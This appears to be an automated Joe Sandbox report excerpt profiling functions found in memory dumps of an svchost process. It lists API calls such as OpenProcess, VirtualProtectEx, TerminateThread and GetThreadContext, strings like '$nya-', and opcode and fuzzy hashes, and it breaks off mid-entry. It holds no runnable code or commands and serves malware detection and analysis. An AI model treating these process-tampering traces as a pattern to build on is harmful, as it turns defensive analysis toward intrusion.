Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 61e99bd44086ce1a9c3d92b8145ffb1c8a51ab0c6670d57d6fe32deb477e0ab1
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: BD119D31310F4086E7528BD2E864799B6F6F3D9BE5F400224EA5EA7BD4CF78D8189740

Function 00000195DD5D3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000195DD5D3431
GetLastError.KERNEL32 ref: 00000195DD5D343D
CloseHandle.KERNEL32 ref: 00000195DD5D3455
CreateFileW.KERNEL32 ref: 00000195DD5D3480
WriteConsoleW.KERNEL32 ref: 00000195DD5D349F

Strings

CONOUT$, xrefs: 00000195DD5D3461

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 9673749c80689405cb27e1947fa18407ca0b4ae13b329d49da9e1e584f6e30e4
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 8D116D32310F4086E7629BD6E864799A7F2F789BE5F444224EA5E97F98CF78C8048750

Function 00000195DE1A6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000195DE1A62AB
GetThreadContext.KERNEL32 ref: 00000195DE1A6415

Part of subcall function 00000195DE1A60A0: GetCurrentThreadId.KERNEL32 ref: 00000195DE1A60A4

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: bc5eda10619a455d92c6f244712a9e3dd5dcd9069bf9e975d3ea71398562124c
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: E6D1CE76204F4881DB71DB96E4A13AAB7F1F388B88F500216EA8D97769CF3CD545DB00

Function 00000195DD5C6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000195DD5C62AB
GetThreadContext.KERNEL32 ref: 00000195DD5C6415

Part of subcall function 00000195DD5C60A0: GetCurrentThreadId.KERNEL32 ref: 00000195DD5C60A4

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: c9f7590fe9a31f06c5d039114139c97e9c881bd7ac59af54af26ccaf478e6330
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: F6D17A76205F8882DB719B5AE4A439A77F5F388B88F500216EACD97BA5DF3CC551CB00

Function 00000195DE1A2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000195DE1A20A6
TlsFree.KERNEL32 ref: 00000195DE1A225F
TlsFree.KERNEL32 ref: 00000195DE1A226B
TlsFree.KERNEL32 ref: 00000195DE1A2277
TlsFree.KERNEL32 ref: 00000195DE1A2283
TlsFree.KERNEL32 ref: 00000195DE1A228F

Part of subcall function 00000195DE1A5E50: GetCurrentThreadId.KERNEL32 ref: 00000195DE1A5E66

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 944295087ff4342f6c563597701f1f0ce5d21852a5b564f57009d10a4fbb4fca
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7951A431341F4595EB07DBE4E8B22E873E3BB44748F840815A92D667A5EF78E52EE340

Function 00000195DD5C2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000195DD5C20A6
TlsFree.KERNEL32 ref: 00000195DD5C225F
TlsFree.KERNEL32 ref: 00000195DD5C226B
TlsFree.KERNEL32 ref: 00000195DD5C2277
TlsFree.KERNEL32 ref: 00000195DD5C2283
TlsFree.KERNEL32 ref: 00000195DD5C228F

Part of subcall function 00000195DD5C5E50: GetCurrentThreadId.KERNEL32 ref: 00000195DD5C5E66

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 989a51a3c5a7e9c4054c3d96eaee29c516d260d55ee48d5ab71c58b66d2efc5a
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: DA51C631202F4995EB17EBA9E871BD833E3FB04744F840815A52EA6FA5EFB8C558C340

Function 00000195DE1A35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000195DE1A24D1), ref: 00000195DE1A35EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000195DE1A24D1), ref: 00000195DE1A35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000195DE1A24D1), ref: 00000195DE1A3673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000195DE1A24D1), ref: 00000195DE1A36D9
HeapFree.KERNEL32(?,?,?,?,?,00000195DE1A24D1), ref: 00000195DE1A36E7

Strings

$nya-, xrefs: 00000195DE1A366C

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 1276d8991bd2105613a1e4f7f785b6c9abda30482be81a6724e813a275b7a211
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: D531AC32701F5182EB13DFD6A5653B963E2BB94B84F0840208F5C67B55EF38E5AA9300

Function 00000195DD5C35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000195DD5C24D1), ref: 00000195DD5C35EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000195DD5C24D1), ref: 00000195DD5C35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000195DD5C24D1), ref: 00000195DD5C3673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000195DD5C24D1), ref: 00000195DD5C36D9
HeapFree.KERNEL32(?,?,?,?,?,00000195DD5C24D1), ref: 00000195DD5C36E7

Strings

$nya-, xrefs: 00000195DD5C366C

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: d889df4fe8d1a840769c70fd5203ff54fc7a19c2d2b0e5b470582681e6a1678b
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 1E318032702F5997FB52DFAAE5607A967E2FB44B84F0840209F59A7F55EF38C4A18700

Function 00000195DE1AC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000195DE1AC94F
SetLastError.KERNEL32 ref: 00000195DE1AC96E
FlsSetValue.KERNEL32 ref: 00000195DE1AC997
FlsSetValue.KERNEL32 ref: 00000195DE1AC9A8
FlsSetValue.KERNEL32 ref: 00000195DE1AC9B9

Part of subcall function 00000195DE1AD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000195DE1A674A), ref: 00000195DE1AD2B6
Part of subcall function 00000195DE1AD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000195DE1A674A), ref: 00000195DE1AD2C0

SetLastError.KERNEL32 ref: 00000195DE1AC9DC

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: e11bbea06196bbc199e581ac06c3e20bbd0685195d77fb4270d9697d9ae5dd5f
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 34113D31300F4142FB56E7F168323FE22D3AB897A4F554625A867777D6DE28E80AA301

Function 00000195DD5CC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000195DD5CC94F
SetLastError.KERNEL32 ref: 00000195DD5CC96E
FlsSetValue.KERNEL32 ref: 00000195DD5CC997
FlsSetValue.KERNEL32 ref: 00000195DD5CC9A8
FlsSetValue.KERNEL32 ref: 00000195DD5CC9B9

Part of subcall function 00000195DD5CD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000195DD5C674A), ref: 00000195DD5CD2B6
Part of subcall function 00000195DD5CD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000195DD5C674A), ref: 00000195DD5CD2C0

SetLastError.KERNEL32 ref: 00000195DD5CC9DC

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 0b9045c82b04addd83dc5d791b3e16171f63e91f116109334304dd3d99634190
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 10114F35302E4882FB5667FA6C313FE53D3AB85790F944625A86BF6FCACE28D4018300

Function 00000195DE1A1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000195DE1A1A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000195DE1A1A74
PathFindFileNameW.SHLWAPI ref: 00000195DE1A1A83
lstrlenW.KERNEL32 ref: 00000195DE1A1A8F
StrCpyW.SHLWAPI ref: 00000195DE1A1AA2
CloseHandle.KERNEL32 ref: 00000195DE1A1AB0

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 7d8eb1017b43f4b5396ad9adda2af2bcc80ac7578dd52b9de159e9a0045465e1
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: FB015B71704F8082EB51DB92A86839973E3F799FC1F4840349E4D53754DE38D98AC740

Function 00000195DD5C1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000195DD5C1A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000195DD5C1A74
PathFindFileNameW.SHLWAPI ref: 00000195DD5C1A83
lstrlenW.KERNEL32 ref: 00000195DD5C1A8F
StrCpyW.SHLWAPI ref: 00000195DD5C1AA2
CloseHandle.KERNEL32 ref: 00000195DD5C1AB0

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 55bcea4c2c89e35b6463ee642e84fffe58ee4405f8d15e32e42ae75f7b375612
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 8A018031701F4082EB11DB92A86879963E2F789FC1F884034DE9E93B54DE7CC585C790

Function 00000195DE1A3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000195DE1A3AAC), ref: 00000195DE1A3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DE1A3AAC), ref: 00000195DE1A3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DE1A3AAC), ref: 00000195DE1A3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DE1A3AAC), ref: 00000195DE1A3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DE1A3AAC), ref: 00000195DE1A3E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000195DE1A3AAC), ref: 00000195DE1A3EAE

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 632148a9d37a8770e03a773fd2a0afd4088a582302557ae64b0d27b54c13c175
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 11015B74B05F4082EB669BE5E86839972F2AB99B42F040024D94D663A4EF3DD05DD700

Function 00000195DD5C3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000195DD5C3AAC), ref: 00000195DD5C3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3AAC), ref: 00000195DD5C3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3AAC), ref: 00000195DD5C3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3AAC), ref: 00000195DD5C3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3AAC), ref: 00000195DD5C3E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000195DD5C3AAC), ref: 00000195DD5C3EAE

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: a462aad4ab7fa4baf423d458df7630f06fd276381457734578858b334e6ce441
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: B0015275312F44C2FB269BA5E86879973E2BB45B46F040025CD4E67B68EF7DC048C750

Function 00000195DE1A1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000195DE1A1AF4
StrCmpNIW.SHLWAPI ref: 00000195DE1A1B0E
lstrlenW.KERNEL32 ref: 00000195DE1A1B1D
StrCpyW.SHLWAPI ref: 00000195DE1A1B32

Strings

\\?\, xrefs: 00000195DE1A1B02

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 007245ec54d75a794716289a711f6e9c89786dcaf702f45a6b3a02fbf55a59ab
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: C7F0AF72304A8492EB618BE1F8E43A973B3F795B89FC44021DA4953A64DE7CD68DDB00

Function 00000195DD5C1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000195DD5C1AF4
StrCmpNIW.SHLWAPI ref: 00000195DD5C1B0E
lstrlenW.KERNEL32 ref: 00000195DD5C1B1D
StrCpyW.SHLWAPI ref: 00000195DD5C1B32

Strings

\\?\, xrefs: 00000195DD5C1B02

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: d6e9e678f82bab4348688637e1629e2a6a37cdb1a011e7df00299222928d5e71
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 36F0C832304E8592E7218FA5F4E47D963E2F754BC8FC44021CA4952E54DF7CC688CB10

Function 00000195DE1AB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

